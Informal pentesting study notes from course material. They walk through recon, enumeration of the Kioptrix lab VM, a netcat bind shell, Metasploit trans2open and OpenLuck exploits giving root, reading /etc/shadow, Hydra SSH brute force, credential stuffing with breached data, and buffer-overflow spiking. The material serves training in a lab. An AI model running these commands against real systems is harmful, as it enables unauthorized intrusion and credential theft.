Pentest- Hands-on exp.
PENTESTING NOTES Hands-on exp.
DISCLAIMER:
- This document contains unedited notes and has not been formally proofread.
- The information provided in this document is intended to provide a basic understanding of certain technologies.
- Please exercise caution when visiting or downloading from websites mentioned in this document and verify the safety of the website and software.
- Some websites and software may be flagged as malware by antivirus programs.
- The document is not intended to be a comprehensive guide and should not be relied upon as the sole source of information.
- The document is not a substitute for professional advice or expert analysis and should not be used as such.
- The document does not constitute an endorsement or recommendation of any particular technology, product, or service.
- The reader assumes all responsibility for their use of the information contained in this document and any consequences that may arise.
- The author disclaim any liability for any damages or losses that may result from the use of this document or the information contained therein.
- The author reserve the right to update or change the information contained in this document at any time without prior notice.
- Any attempts to perform penetration testing or ethical hacking on systems or networks should be done with the explicit permission of the system/network owner. Unauthorized access is illegal and can result in serious legal consequences.
- It is important to fully understand the scope of the testing and to only test within that scope. Testing outside the agreed upon scope is considered unauthorized and may result in legal action.
- Any findings or vulnerabilities discovered during testing should be reported to the system/network owner immediately and kept confidential until a fix can be implemented.
- It is recommended to use a separate, dedicated testing environment rather than testing on a live production system to minimize the risk of accidentally causing damage or downtime.
- It is important to take steps to protect your own identity and prevent accidental data leaks or exposure of sensitive information during testing.
- It is also recommended to follow a standard code of ethics for ethical hacking and penetration testing.
REFERENCES:
- https://www.linkedin.com/learning/
- The Cyber mentor Youtube channel
- So You Want to Be a Hacker: 2023 Edition- Heath Adams
- Full Ethical Hacking Course - Beginner Network Penetration Testing (2019)
- Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)
- Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 2)
***********************************************************************
CONTENTS
- PENTEST PHASE STEPS
- INTRODUCTION
- BASIC COMMANDS
- KALI
- Nmap Commands
- Linux commands
- BEGINNER NETWORK PEN TESTING
- Booting Kali
- Building a script
- Executing the python file
- Building script for a scanning (socket) - Scanner.py
- The Five stages of Ethical hacking
- Reconnaissance
- Collection of information Gathering
- Searching sub domains
- Website technologies:
- BURP suite
- Nikto
- Enumeration : Preparation
- Installing Kiptrix
- NMAP scan
- Enumeration : HTTP/HTTPS
- Now trying to run enumeration using nikto - web vulnerability scanner
- Dirbuster / gobuster / dirb
- Enumeration SMB
- Metasploit Framework
- SMBCLIENT
- Enumerating SSH
- Scanning with Nessus
- Exploitation
- Netcat Reverse shell
- Staged Vs Non staged payloads
- Gaining Root with metasploit
- Manual Exploitation
- OPENLUCK exploitation
- Brute Force Attack
- Credential Stuffing and Password spraying
- Pentest Report- revisited
- Building vulnerable machine and attack machine
- HANDS ON EXPERIENCE
- 01 - VULNERABLE MACHINE: HACKTHEBOX [HTB]
- 02 - VULNERABLE MACHINE: ACTIVE DIRECTORY
- 03 - VULNERABLE MACHINE : BLUE
***********************************************************************
PENTEST PHASE STEPS
- Planning
- Obtain written permission
- Identify rules of engagement
- Set Goals
- Finalize management approval
- Discovery
- Scanning and Enumeration
- Vulnerability analysis
- Exploitation or Attack
- Demonstrate the risk to the organizations
- Business impact
- Gaining access
- Escalation privileges
- System browsing
- Install additional tools
- Determining extent of the vulnerabilities
- Reporting
INTRODUCTION
Pentesting, or penetration testing, is the practice of simulating an attack on a computer system, network, or web application to test its defenses and identify vulnerabilities. There are many resources available to learn pentesting, including online courses, books, and hands-on experience.
Here are some steps you can follow to learn pentesting:
Action Plan
Transitioning to a career in Pentesting may require some additional steps and planning, but it is certainly possible. Here is a table outlining some steps that you can take:- Familiarize yourself with the basics of computer science and networking. This can involve taking online courses or reading books to learn about topics such as data structures, algorithms, and network protocols.
- Learn a programming language such as Python or linux commands. These languages are commonly used in pentesting and can be useful for creating custom tools. You can find online tutorials and resources to help you learn these languages.
- Get hands-on experience by setting up a lab environment and practicing on vulnerable systems. There are many virtual machine images available online that you can use for this purpose.
- Join online communities and forums where you can learn from other pentesters and get feedback on your work.
- Consider obtaining a certification in pentesting, such as the Offensive Security Certified Professional (OSCP) or the Certified Ethical Hacker (CEH). These certifications can help demonstrate your knowledge and skills to potential employers.
- Look for opportunities to gain practical experience, such as internships or part-time positions, to help you build your resume and network.
- Consider seeking out additional education or training, such as a degree in computer science or cybersecurity, to help you stand out in the field.
Hands-on experience
Gaining hands-on experience is an important step in learning about pentesting and becoming proficient in the field. Here are a few ways you can gain hands-on experience:- Set up a lab environment using virtualization software such as VMware or VirtualBox. This will allow you to create and run virtual machines on your computer, which you can then use to practice on vulnerable systems.
- Download and use virtual machine images that are specifically designed for pentesting. These images often come pre-configured with vulnerable systems and tools that you can use to practice identifying and exploiting vulnerabilities.
- Participate in Capture the Flag (CTF) events and hackathons. These are competitions where teams of participants work to solve challenges and "capture" flags by finding and exploiting vulnerabilities in systems and networks.
- Seek out internships or part-time positions in the field of cybersecurity. These types of opportunities can provide you with practical experience working on real-world systems and projects.
There are many vulnerable systems that you can download and practice on to gain hands-on experience in pentesting. Here are some steps you can follow to find and download these systems:
- Search for virtual machine images that are specifically designed for pentesting. These images often come pre-configured with vulnerable systems and tools that you can use to practice identifying and exploiting vulnerabilities.
- Download and install virtualization software such as VMware or VirtualBox. This will allow you to create and run virtual machines on your computer.
- Download a vulnerable virtual machine image and import it into your virtualization software.
- Start the virtual machine and begin practicing on the vulnerable system.
Vulnerable virtual machine images
Here are a few links to sites where you can find vulnerable
virtual machine images:
https://www.vulnhub.com/
Here is the listing few vulnerable virtual machine images and their download links
Metasploitable
A Linux virtual machine designed for testing security tools and demonstrating common vulnerabilities
https://sourceforge.net/projects/metasploitable/
Kali Linux
A Linux distribution designed for pentesting and digital forensics
https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/
VulnHub
A collection of vulnerable virtual machine images for practicing pentesting
https://www.vulnhub.com/
Conduct pentesting :- ethical hacking
Here are a few more companies that allow individuals to conduct pentesting, also known as ethical hacking, on their systems as a way to identify vulnerabilities and improve security:
- HackerOne
- https://www.hackerone.com/
- A platform that connects organizations with a community of hackers who can test their systems and report vulnerabilities
- Bugcrowd
- https://www.bugcrowd.com/
- A platform that crowdsources cybersecurity testing by connecting organizations with a global community of researchers
- Synack
- https://www.synack.com/
- A platform that uses a combination of artificial intelligence and a community of vetted hackers to test the security of systems
- Cobalt
- https://cobalt.io/
- A platform that connects organizations with a global community of cybersecurity researchers who can test their systems and report vulnerabilities
- HackenProof
- https://hackenproof.com/
- A platform that connects organizations with a community of hackers who can test their systems and report vulnerabilities
- Tenable
- https://www.tenable.com/
- A platform that offers a range of cybersecurity testing services, including vulnerability assessment and penetration testing
- Intigriti
- https://www.intigriti.com/
- A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
- Zerocopter
- https://www.zerocopter.com/
- A platform that crowdsources cybersecurity testing by connecting organizations with a global community of researchers
- Kaspersky Secure Testing Services
- https://www.kaspersky.com/secure-testing-services
- A range of cybersecurity testing services offered by Kaspersky, including vulnerability assessment and penetration testing
- Veracode
- https://www.veracode.com/
- A platform that offers a range of cybersecurity testing services, including application security testing and secure code review
- Clearview
- https://www.clearviewinfosec.com/
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- BugBountyHQ
- https://www.bugbountyhq.com/
- A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
- Crowdcurity
- https://www.crowdcurity.com/
- A platform that crowdsources cybersecurity testing by connecting organizations with a global community of researchers
- Kudelski Security
- https://www.kudelskisecurity.com/services/cybersecurity-testing/
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- Peerlyst
- https://www.peerlyst.com/
- A platform that connects organizations with a community of cybersecurity experts who can test their systems and report vulnerabilities
- Hacken
- https://hacken.io/
- A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
- SafeHat
- https://www.safehats.com/
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- Alibaba Cloud
- https://www.alibabacloud.com/security/security-testing
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- Bounty Factory
- https://www.bountyfactory.io/
- A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
- Symantec
- https://www.symantec.com/security-center/services/penetration-testing
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- Gurucul
- https://www.gurucul.com/services/cybersecurity-services/penetration-testing.
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- https://www.cybrary.it/ A platform that offers free and paid online courses in cybersecurity and IT, including a course on pentesting.
- A platform that offers free and paid online courses in cybersecurity and IT, including a course on pentesting
- Pentester Academy
- https://www.pentesteracademy.com/
- A platform that offers a range of online courses in cybersecurity, including a course on pentesting
- Hackr.io
- https://hackr.io/
- A platform that aggregates online courses and tutorials in various fields, including cybersecurity
- Udemy
- https://www.udemy.com/
- An online learning platform that offers a range of courses in various fields, including cybersecurity
- edX
- https://www.edx.org/
- An online learning platform that offers a range of courses in various fields, including cybersecurity
**********************************************************************
BASIC COMMANDS
KALI
- ─(kali㉿kali)-[~]
└─$ ip a
- $ route
- $ arp -a
- $ ip n
- Create files
- echo
- cat
- touch
- Updating file
- nano
- gedit
- mousepad
- Service
- sudo service apache2 start
- sudo service apache2 stop
- Start server
- python3 -m http.server 80
- Update && Upgrade
- sudo apt update && upgrade
- git
- git clone https://github.com/Dewalt-arch/pimpmykali
- grep
- cat ip.txt | grep "64 bytes" | cut -d " " -f 4 | tr -d ":"
- Sockets
- = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # af_inet is ipv and sock.stream is a port
Nmap Commands
Nmap Tutorial to find Network Vulnerabilities
- nmap -sS -D 10.1.0.1
-D = decoy and specifying a dummy ip-address
Nmap Scripting Engine (NSE)
to check vulnerabilities
- sudo nmap --script vuln
Security Testing: Nmap Security Scanning
- dig www.google.com = gives the IP address
-Pn No Host discovery = Nmap skips the host searching process & performs full target scan
-PS means TCP SYN request
-PA means TCP ACK request
-PU means UDP request
-PE means ICMP echo request
-PR means ARP request
- TCP Scan Types
-sS TCP SYN scan ( half open scan / stealthy scan)
-sT = TCP connect scan (full open scan)
-sN = TCP NULL scan
-sF = TCP FIN scan
-sX = TCP Xmas scan
-sA = TCP ACK scan
-sW = TCP window scan
-sM = TCP maimon scan
-F flag does a fast scan
e.g. nmap -F 192.168.1.1
Timing template
-T5 insane
-T4 aggressive
-T3 Normal
-T2 polite
-T1 sneaky
-T0 paranoid
-sV = Service version detection
- sudo nmap -sV -O -F 10.0.2.4
E.g. = nmap -T4 -F 192.168.1.*
-A option provide details and inbuilt script of nmap scan
sudo nmap -A -T4 192.168.1.*
- nmap saving output files
-oN = Human readable text file
-oX = Machine readable file
-oG = Grepable text file
- -v = allows to see progress by nmap
DNS spoofing:
windows powershell : ipconfig /displaydns
***********************************************************************
How to check a website:
First step to check a website with robots.txt
https://www.google.com/robots.txt
HackThisSite
hackthissite.org
HackThisSite.org, commonly referred to as HT
Page source or inspect element or Ctrl+U
Check for
- Passwords in comments
Comments
Hidden forms
Developer tools - ctrl+Shift+I
Linux commands
- Ls
- Cd
- Grep
- Su
- Pwd
- Whoami
- Mv
- Cp
- Mkdir
- Cat
Tools:
Kali Linux
Scanning
- Nmap
- Nikto
- Zenmap
- Threader3000
- angry IP
- NetCat
- Hydra
- Wireshark
- Dirbuster
- Burp suite
Exploit
- metasploit
**********************************************************************
BEGINNER NETWORK PEN TESTING
Booting Kali
The Cyber mentor Youtube channel
- Full Ethical Hacking Course - Beginner Network Penetration Testing (2019)
- Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)
- Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 2)
root@Kali - # pwd
root@Kali - # ls -la
Update the internal database
root@Kali - # updatedb
root@Kali - # locate filename.txt
Manual command
root@Kali -# man ls
Change the file permission to executable
root@Kali - # chmod +x filename.txt
Adding user
root@Kali - # adduser bob
Command to identify the root users and other users in the system using etc/passwrd
root@Kali - # cat /etc/passwrd
Shadow command: this file contains the hash function for the user which can be used to crack the password of the user.
root@Kali - # Cat /etc/shadow
Switch user
root@Kali - # su username
username@kali - #
Switching back to root
username@kali - # su -
root@Kali
Network Commands
root@Kali - # ifconfig
root@Kali - # iwconfig
Ping with count command
root@Kali - # ping -c 1 192.168.1.1
To find the broadcast id or to capture a flag who has this mac address with the ip address
root@Kali - # arp -a
Find open ports and related to
root@Kali - # netstat -ano
root@Kali - # route
root@Kali - # history
Starting Services
root@Kali - # service apache2 start
root@Kali - # service ssh start
root@Kali - # service postgresql start
root@Kali - # service apache2 stop
root@Kali - #systemctl enable ssh
root@Kali - # systemctl enable postgresql
root@Kali : ~ /Desktop# ping -c 1 192.168.1.2 > ip.txt
root@Kali : ~ /Desktop# cat ip.txt
Building a script :
Just trying to pull or grab the text using grep, cutting using delimiter -d and using space 4 then transforming : as space.
root@Kali : ~ /Desktop# Cat ip.txt | grep “64 bytes” | cut -d “ “ -f 4 | tr -d “:”
root@Kali : ~ /Desktop# nano ipsweep.sh
Python Cheat sheet;
https://darknetdiaries.com/imgs/Python-CheatSheet.pdf
Creating script
to cpy lines from nano crtl+sht+c and paste in external notepad
(root㉿kali) nano ipsweep.sh
GNU nano 7.2 ipsweep.sh
#!/bin/bash
if [ "$1" == "" ]
then
echo "You forgot an ip address"
echo "The Syntax ./ipsweep.sh 192.168.1"
else
for ip in `seq 1 254`; do
ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done
fi
********************
Executing the python file
now running the script
root㉿kali# ./ipsweep.sh 192.168.1 > iplist.txt
doing nmap scan with the obtained ip and using it from the stored file.
root㉿kali # for ip in $(cat iplist.txt); do nmap -p 80 -T4 $ip & done
root㉿kali # gedit python101.py
#!/bin/python3
#print string
print("strings and things:")
print('hello world')
print("""hello,this is
a multi line string""")
print('\n') #new line
#math
print('math time')
print(50 + 50) #add
print('\n') #new line
#variable and methods
quote ="All if fun"
print(len(quote))
print(quote.upper)
name ="Health"
age = 29
gpa = 3.9
print(int(age))
print("may name is "+ name + " i am " + str(age) + " yrs")
print('\n') #new line
#functions
print("some fun")
def who_am_i():
name = "Health"
age = 29
print("may name is "+ name + " i am " + str(age) + " yrs")
who_am_i()
#adding parameters
def add_one_hundred(num):
print(num + 100)
add_one_hundred(100)
#boolean parameters
#relation and boolean parameters
#conditional statements
print("conditonal para")
def soda(money):
if money >= 2:
return "U have got a soda"
else:
return "No soda"
print(soda(3))
print(soda(1))
print('\n') #new line
#Lists
print("Lists")
movies = ["one","two","three","four"]
print(movies[0])
#Tuples
#looping
print("for loops")
veg = ["cucu","carr","app"]
for x in veg:
print(x)
print("while loops is true")
i = 1
while i < 10:
print(i)
i += 1
********************
Executing the python file
Giving write permission
root㉿kali # chmod +x python101.py
root㉿kali # python3 python101.py
root㉿kali # - gedit py102.py
#!/bin/python3
#importing
print("importing")
import sys #system functions and parameters
from datetime import datetime
print(datetime.now())
from datetime import datetime as dt #importing with an alias
print(dt.now())
def new_line():
print('\n')
new_line()
#advance strings
print("advance strings")
my_name = "Health"
print(my_name[0]) #first initial
sentence = "this is a sentence"
print(sentence[:4]) #first word
#Dictionaries
print("Dictionaries are with key and value")
********************Executing the python file
root㉿kali- python3 py102.py
if you want to host a simple server then
root㉿kali-# python3 -m http.server 80
root㉿kali-# install pyftpdlib
Building script for a scanning (socket) - Scanner.py
#!/bin/python3
import sys #allows to enter cmd line arguments
import socket
from datetime import datetime
#define our target
if len(sys.argv) == 2:
target = socket.gethostbyname(sys.argv[1]) #Translate a hostname to IPV4
else:
print("invalid amount of arguments")
print("syntax: python3 scanner.py <ip>")
sys.exit()
#add a pretty banner
print("-" * 50)
print("Scanning target "+target)
print("Time started: "+str(datetime.now()))
print("-" * 50)
try:
for port in range(50,85):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(1) #is a float
result = s.connect_ex((target,port)) #returns error indicator
print("Checking port {}".format(port))
if result == 0:
print("Port {} is open".format(port))
s.close()
except keyboardInterrupt:
print("\nExiting program.")
sys.exit()
except socket.gaierror:
print("Hostname could not be resolved.")
sys.exit()
except socket.error:
print("couldnt connect to server")
sys.exit()
*****Executing scanner.py
root㉿kali-# python3 scanner.py 192.168.1.1
The Five stages of Ethical hacking
- Reconnaissance
- Active & passive
- Scanning & Enumeration
- Nmap, Nessus, Nikito, etc.
- Gaining Access
- exploitation
- Maintaining Access
- Covering Tracks
Reconnaissance
Passive
- Location information
- Job information
- Web/ Host
- Target validation
- WHOIS, nslookup, dnsrecon
- Finding subdomains
- google FU, dig, nmap, sublister, Bluto, crt.sh
- Fingerprinting
- nmap, wappalyzer, whatweb, builtwith, netcat
- Data Breaches
- haveibeenpwned, breach-prase, weleakinfo
BUG-Crowd programs
- https://bugcrowd.com/programs
- example : tesla.com
Here are a few places where you can find bug bounty programs:
Bugcrowd (https://www.bugcrowd.com/): Bugcrowd is another platform that connects security researchers with organizations that offer bug bounty programs. Many companies in industries such as finance, healthcare, and technology use Bugcrowd to run their bug bounty programs.
Open Bug Bounty (https://www.openbugbounty.org/): Open Bug Bounty is a non-profit organization that aims to make the internet a safer place by encouraging website owners to run a public bug bounty program. The organization provides a platform for security researchers to report vulnerabilities they find in participating websites.
BountyFactory (https://bountyfactory.io/): BountyFactory is a platform that aggregates bug bounty programs from various companies, making it easy for security researchers to find and participate in programs.
Synack (https://www.synack.com/): Synack is a company that provides managed crowdsourced security testing services to organizations. Security researchers can apply to become part of Synack's "Red Team" and participate in private bug bounty programs for Synack's clients.
Collection of information Gathering
Discovering email address:
https://hunter.io/
https://phonebook.cz/
https://www.voilanorbert.com/
https://clearbit.com/resources/tools/connect
Checking email id are valid
https://tools.emailhippo.com/
https://email-checker.net/
https://github.com/hmaverickadams/breach-parse
Hunting Breached Credential's
https://www.dehashed.com/ - paid version
 |
| Deahased home Page |
 |
| Dehashed- results |
Searching sub domains
- ─$ sudo apt install sublist3r
- sublist3r -d tesla.com
- https://crt.sh/
- Searching tesla.com
- https://github.com/OWASP/Amass
- The OWASP Amass Project has developed a tool to help information security professionals perform network mapping of attack surfaces and perform external asset discovery using open source information gathering and active reconnaissance techniques.
- https://github.com/tomnomnom/httprobe
- Take a list of domains and probe for working http and https servers.
Website technologies:
- https://builtwith.com/
 |
| builtwith.com |
- Wappalyzer:
- Find out what websites are built with https://www.wappalyzer.com
- The Wappalyzer APIs provide instant access to website technology stacks, company and contact details, social media profiles, email verification and more
 |
| wappalyzer |
- WhatWeb Usage Example
- ─$ whatweb tesla.com
https://www.kali.org/tools/theharvester/
- root㉿kali-# theHarvester -h
- root㉿kali-# theHarvester -d apple.com -l 500 -b bing
BURP suite
- Community edition
- https://portswigger.net/burp/releases/professional-community-2023-1-2requestededition=community&requestedplatform=
- Setting up Burp suite
- opening the burpsuite
- next opening the Firefox, hamburger menu, settings, network settings
- manual proxy configuration
- http proxy : 127.0.0.1 Port:8080
- same for https proxy & SOCKS host
- New tab - https://burp/
 |
| Burp suite |
- download the CA certificate and save
- Go to settings- Privacy & Security - click view certificate - import - select the file - click the 2 check boxes and ok
- Open the Burp suite- Proxy tab - click intercept on.
- then open browser - tesla.com
- Burp suit/ Proxy Tab - captures
- Burp suit/ Target Tab
 |
| Burp suite |
Nikto
- root@kali:~# nikto -h https://tesla.com
GOOGLE FU
Google-fu (uncountable) (informal) Skill in using search engines (especially Google) to quickly find useful information on the Internet.
Using google to maximize the search results
search query examples
- site:tesla.com # here you are searching against the site
- site:tesla.com -www # removing "WWW"
- site:tesla.com -www -r # removing both - "www, ir"
- site:tesla.com filetype:pdf
Social Media:
Gather information on people from
**************************************
Enumeration : Preparation
Installing Kiptrix
- Original source
- https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
- Modified version
- https://tcm-sec.com/kioptrix
- https://drive.google.com/drive/folders/1z923e0icfJADbhgS0Qfaxuez-GJTWvjt
Now importing the image in Virtual box
- Setting all the virtualbox machine under "NATNETWORK"
Kioptrix vul machine is turned on
Kioptrix_Level_1.
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
# arp-scan -l
ifconfig
Scanning Starts
root@kali:~# netdiscover -r 192.168.1.0/24
- Getting the kioptrix ip address to perform attack
NMAP scan
To scan all ports "-p-" which take long time based on the domain ranging from 15 minutes to 12 hrs. Doing so will be able to find all the options to find the vulnerabilities.
Step 1: Just to find all the open ports only
- root@kali:~# nmap -T4 -p- 192.168.202.130
Step 2: Scan for TCP and UDP protocols- suggestion scan for top 1000 ports
- nmap -sU -T4 -p 192.168.202.130
Step 3: Now find the open ports and then giving the ports to get all details
Now after getting the open port details
- root@kali:~# nmap -A -T4 -p22,80,111,139,443,32768 192.168.202.130
- Port 22 is open SSH service
- Port 80 open Apache https 1.3.20
- Port 139 open netbios-ssn samba
- Port 443 open ssl/https apache/1.3.20
Enumeration : HTTP/HTTPS
Now 192.168.202.130 is executed in the browser
- A apache test page is displayed as below [Kioptrix vul machine]
Now creating report
Take screenshot and provide details
For IP address 192.168.202.130
 |
| PORT open disclosure |
Now clicking on the manual link lead to 404
- we are able to see the version of apache and server name revealed and the port number all these are internal information which are exposed.
 |
| Information Disclosure : - 404 page |
Now trying to run enumeration using nikto - web vulnerability scanner
- root@kali:~# Nikto -h 192.168.202.130
- also try - Nikto -h http://192.168.202.130
 |
| nikto |
- able to read the scan report what are the vulnerabilities listed from the scan results
- anti-clickjacking not present
- x-xss protection header not defined
- apache outdated
- mod_ssl outdated
Dirbuster / gobuster / dirb
kali ~# dirbuster& |
| dirbuster |
The Dirbuster window opens up
- Target url http://192.168.202.130:80/
- File with list of dirs/files: Browse - click up- usr/ share/wordlists/dirbuster/
- Select any file - for time being use- directory-list-lowercase-2-3-small.txt
- File extension : php,asa,sql,zip,tar,pdf,txt,bak - add what more file extensions need to be searched.
- file extensions are selected based on the base server is on php
 |
| Dirbuster window |
Once the results are populated and now we are trying to turn local host for burp suite
 |
| internal host |
Meanwhile burp site is loading then we are trying to find some more information by checking the source code by right click on the page and select source code.
- checking the comments for keys, passwords, hints, dir structure or any other information useful for gaining access in the source code
 |
| source code |
Now Burp suite is ready and intercept is on to capture the results and sending to repeater.
 |
| Burp suite |
Adding the target http://ipaddress to the scope tab
 |
| Burp suite - Scope |
Now we can see the information disclosure from Burp suite - Sitemap tab - Raw show the details of the server.
This was visible from nikto scan as well
The Pentestion Report: updated as below image
response code
200 = ok
400 = error or found
300 = redirects
500 = server errors
Copy the url and open in the browser : http://192.168.57.134/usage/usage_201911.html
 |
| Dirbuster result |
 |
| usage_201911 html |
Enumeration SMB
Now trying to enumerate SMB on port 139we are trying to get vulnerabilities- SMB and its version used in the server.
Metasploit Framework is started
kali:~# msfconsole
msf5> search smb
msf5 auxiliary(scanner/smb/smb_version) > options
Now we are able get the version samba 2.2
root@kali:~# smbclient \\\\192.168.57.134\\IPC$
We have not got the password and hence terminating - CTRL + C
msf5> search smb
 |
| msfconsole search smb |
msf5> use auxiliary/scanner/smb/smb_version
 |
| use auxiliary/scanner/smb/smb_version |
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.202.130
msf5 auxiliary(scanner/smb/smb_version) > run
SMBCLIENT is started
root@kali:~# smbclient -L \\\\192.168.57.134\\root@kali:~# smbclient \\\\192.168.57.134\\ADMIN$
smb: \>
smb: \> help
smb: \> ls
access denied
smb: \> exit
The access denied is seen as dead-end
Enumerating SSH
kali:~# ssh 192.168.57.134
kali:~# ssh 192.168.57.134 -oKexAlgorithms=+diffie-hellman-group1-sha1
kali:~# ssh 192.168.57.134 -oKexAlgorithms=+diffie-hellman-group1-sha1 -c ases128-cbc
We have not got the password and hence terminating - CTRL + C
Researching potential vulnerabilities
Pentest Report - Notesresearching for "mod_ssl/2.8.4 exploit"
Port 80/443 - Potentially vulnerable as follows
Results received: -
- https://www.exploit-db.com/exploits/764
- https://github.com/heltonWernik/OpenLuck
Apache 1.3.20 vulnerabilities
Results received: -- https://www.exploit-db.com/exploits/19975
- https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-369927/Apache-Http-Server-1.3.20.html
Samba 2.2.1 vulnerabilities
Port 139 - potential vulnerable to trans2open
Results received: - rapid7 gives a metasploit exploit- https://www.rapid7.com/db/modules/exploit/linux/samba/trans2open/
- Module Options
- To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
- msf > use exploit/linux/samba/trans2open
- msf exploit(trans2open) > show targets
- ...targets...
- msf exploit(trans2open) > set TARGET < target-id >
- msf exploit(trans2open) > show options
- ...show and set options...
- msf exploit(trans2open) > exploit
Now using Kali we can search the exploit
kali:~# searchsploit samba 2.2
kali:~# searchsploit mod ssl 2
kali:~# searchsploit openssh
kali:~# searchsploit webalizer
Assessment Report
Use any tool to get the assessment report.
Make sure everyone is able understand the report.
Report must be in Business view and Technical view.
 |
Assessment Report |
Scanning with Nessus
Nessus family, Nessus® Essentials
As part of the Nessus family, Nessus® Essentials (formerly Nessus Home) allows you to scan your environment (up to 16 IP addresses per scanner) with the same high-speed, in-depth assessments and agentless scanning convenience that Nessus subscribers enjoy.
Downloading the package
https://www.tenable.com/products/nessus/nessus-essentials
https://www.tenable.com/downloads/nessus?loginAttempted=true
Now installing the deb package
─(kali㉿kali)-[~/Downloads]
└─$ sudo dpkg -i Nessus-10.5.0-ubuntu1404_amd64.deb
- You can start Nessus Scanner by typing /bin/systemctl start nessusd.service
- Then go to https://kali:8834/ to configure your scanner
(kali㉿kali)-[~/Downloads]
└─$ sudo /bin/systemctl start nessusd.service
https://kali:8834/
registering for nessus essentials and creating admin id
Create new scan -> Basic network scan
Give ip address
Discovery : You can change to all port scan or retain common scan
Advance : scan type : default
Save then click launch
also try Create new scan -> Advance scan and try to explore
SCAN results - analysis
Now understanding the nessus scan results.
getting into vulnerabilities click the settings icon and select ungroup
Exploitation
Netcat Reverse shell - uses internal n/w
Target machine to Attackbox
Netcat Bind shell - uses external n/w
Attackbox connected to Target machine
- From Victim machine 4445 is opened:
root@kali:~# nc -lvp 4445 -e /bin/bash
- From attacker machine :
root@kali:~# nc 192.168.57.139 4445
Connection is established and able to connect to the shell
Staged Vs Non staged payloads
Payloads - are exploits
Gaining Root with metasploit
kali:~# searchsploit samba 2.2
kali:~# msfconsole
msf5>
msf5> search trans2open
msf5 > use 1
msf5 exploit(linux/samba/trans2open) > options
msf5 exploit(linux/samba/trans2open) > set rhosts 192.168.57.139
msf5 exploit(linux/samba/trans2open) > options
msf5 exploit(linux/samba/trans2open) > show options
msf5 exploit(linux/samba/trans2open) > show targets
msf5 exploit(linux/samba/trans2open) > options
now there are more payload options displayed by metasploit
This is the non staged payload where is he no /slash
For Staged payload there is / after shell
msf5 exploit(linux/samba/trans2open) > run
Manual Exploitation
OPENLUCK exploitation
root@kali:~# git clone https://github.com/heltonWernik/OpenLuck
root@kali:~# /OpenFuck 0x6b 192.168.57.134 -c 40
Install ssl-dev library
root@kali:~# apt-get install libssl-dev
root@kali:~# gcc -o OpenFuck OpenFuck.c -lcrypto
Running the Exploit
root@kali:~# ./Open
root@kali:~# /OpenFuck 0x6b 192.168.57.134 -c 40
After running the exploit the root privilege is gained - congrats
Now Trying to enumerate from the root using below commands
Arp -a
Route
Sudo -l
Pwd # working directory
Trying to get password hashes
Cat /etc/shadow
Trying here to find some other connected sub networks using the above commands also.
Brute Force Attack
ssh - brute force attack
root@kali:~# hydra -l root -P /usr/wordlists/metasploit/unix_passwords.txt ssh://192.168.157.134:22 -t 4 -V
root@kali:~# msfconsole
msf5> search ssh
msf5> use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login)> options
msf5 auxiliary(scanner/ssh/ssh_login)>set username root
msf5 auxiliary(scanner/ssh/ssh_login)>set pass_file /usr/share/worldlists/metaspolit/unix_passwords.txt
msf5 auxiliary(scanner/ssh/ssh_login)> set verbose true
msf5 auxiliary(scanner/ssh/ssh_login)> run
msf5 auxiliary(scanner/ssh/ssh_login)> run
if there was any success in cracking brute force password the results will show otherwise wont be a single success attempt.
Credential Stuffing and Password spraying
Breach-parse: to collect data from 1.4 billion clear text leakage.
Trying to use the password and user name from the breach-parse data derived
FoxyProxy Standard
adding to the firefox
such the burp suite captures the intercept.
Now selecting the email - click add button and password - add button
Under payloads tab, copying the username and password
Payload set 1 -> Paste username
Payload set 1 -> Paste username
Payload set 2 -> password
Click Start Attack
Now looking in the attack result
GREP match -> clear -> paste ->we could not sign you in
Once again start the attack
the checkboxes shows that user was not signed in.
***********************************
Killing the processes, as the Vulnserver is still not crashed.Changing the script
Once again start the attack
Password Spraying :
Here the username is changed and password is kept constant.
Pentest Report- revisited
Building vulnerable machine and attack machine.
Downloading ISO image from Microsoft for Virtual Box
windows-10-enterprise
https://www.microsoft.com/en-us/evalcenter/download-windows-10-enterprise
windows-server-2016
https://www.microsoft.com/en-gb/evalcenter/download-windows-server-2016
Vulnserver
https://thegreycorner.com/vulnserver.html
Immunity Debugger
https://www.immunityinc.com/products/debugger/
Buffer overflow
Steps to conduct a Buffer overflow
- Spiking
- Fuzzing
- Finding the offset
- Overwriting the EIP
- Finding Bad Characters
- Finding Right Modules
- Generating shellcode
Spiking
- Starting Vulnserver with admin access.
- Starting Immunity debugger with admin access - File -> attach -> Vulnserver; Then click run
- Finding ip address = 10.0.2.5
Starting Kali linux machine
kali)-[~] # sudo nc -nv 10.0.2.5 9999
(UNKNOWN) [10.0.2.5] 9999 (?) open
Welcome to Vulnerable Server! Enter HELP for help.
Now trying to get overflow the stack with below command
kali)-[~]# generic_send_tcp
argc=1
Usage: ./generic_send_tcp host port spike_script SKIPVAR SKIPSTR
./generic_send_tcp 192.168.1.100 701 something.spk 0 0
Kali)-[~]$ gedit stats.spk
s_readline();
s_string("STATS ");
s_string_variable("0");
Trying to execute
